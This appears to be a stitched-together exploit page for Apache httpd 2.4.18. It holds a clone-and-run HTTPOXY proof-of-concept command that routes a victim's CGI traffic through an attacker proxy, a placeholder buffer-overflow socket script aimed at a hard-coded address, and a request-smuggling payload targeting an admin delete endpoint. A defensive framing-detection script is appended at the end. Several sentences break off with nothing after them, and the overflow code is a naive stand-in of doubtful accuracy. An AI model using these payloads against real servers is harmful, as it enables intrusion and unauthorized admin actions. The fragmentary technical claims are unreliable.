Exploit — Apache Httpd 2.4.18

git clone https://github.com/cujanovic/HTTPOXY-PoC
cd HTTPOXY-PoC
python3 httpoxy.py -u http://victim/cgi-bin/test-cgi -p http://attproxy:8080

Let's consider a hypothetical scenario involving a buffer overflow vulnerability (though, for accuracy, Apache 2.4.18 specific vulnerabilities should be checked against CVE databases).

import socket

# Hypothetical exploit - do not use maliciously
def exploit(target_ip, target_port):
    # Crafting a malicious packet (example only)
    malicious_packet = "A" * 1000  # Assuming a buffer size of 1024
    client_socket = None
    try:
        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client_socket.connect((target_ip, target_port))
        client_socket.send(malicious_packet.encode())
    except Exception as e:
        print(f"Failed to exploit: {e}")
    finally:
        # Close the socket only if it was actually created
        if client_socket is not None:
            client_socket.close()

# Example usage
exploit("192.168.1.100", 80)

The following CVEs have public proof-of-concept (PoC) exploits effective against unpatched 2.4.18.

To turn this into an exploit, a penetration tester would:

An attacker targeting a 2.4.18 proxy setup might send:

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 50
Transfer-Encoding: chunked
Content-Length: 0

0

GET /admin/delete?user=admin HTTP/1.1
Host: vulnerable-website.com
Foo: x

Technical breakdown: The front-end proxy processes the Transfer-Encoding: chunked, sees the 0 chunk, and ends the request. But Apache 2.4.18 keeps the socket open and interprets the subsequent GET /admin... as a second request—originating from the victim’s IP, bypassing ACLs.
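
A defensive check for the ambiguous framing in the request above, as an added example that is not part of the original page: it flags a request carrying both Content-Length and Transfer-Encoding, conflicting Content-Length values, or bytes after the final chunk, which a front end should reject rather than forward. SAMPLE is constructed from the request shown on this page, and the function names are hypothetical.

```python
# Added example: detects ambiguous HTTP request framing.
# SAMPLE is constructed from the request on this page; names are hypothetical.
SAMPLE = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable-website.com\r\n"
    b"Content-Length: 50\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /admin/delete?user=admin HTTP/1.1\r\n"
    b"Host: vulnerable-website.com\r\n"
    b"Foo: x"
)


def parse_headers(raw: bytes):
    """Split a raw request into ([(name, value), ...], body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = []
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower().decode("latin-1"),
                        value.strip().decode("latin-1")))
    return headers, body


def framing_findings(raw: bytes):
    """Return the framing conflicts found in one raw request."""
    headers, body = parse_headers(raw)
    cl = [v for n, v in headers if n == "content-length"]
    te = [v for n, v in headers if n == "transfer-encoding"]
    findings = []
    # Both length mechanisms present: two parsers may pick different ones.
    if cl and te:
        findings.append("content-length-with-transfer-encoding")
    # Repeated Content-Length headers that disagree with each other.
    if len(set(cl)) > 1:
        findings.append("conflicting-content-length")
    # "chunked" must be the final transfer coding on a request.
    if te and te[-1].split(",")[-1].strip().lower() != "chunked":
        findings.append("unexpected-transfer-encoding")
    # Bytes after the zero-length chunk would be parsed as a second request.
    if te and body.startswith(b"0\r\n\r\n") and len(body) > 5:
        findings.append("data-after-final-chunk")
    return findings
```

An empty list means the framing is unambiguous; any finding is grounds for the front end to answer 400 and close the connection instead of passing the bytes to the back end.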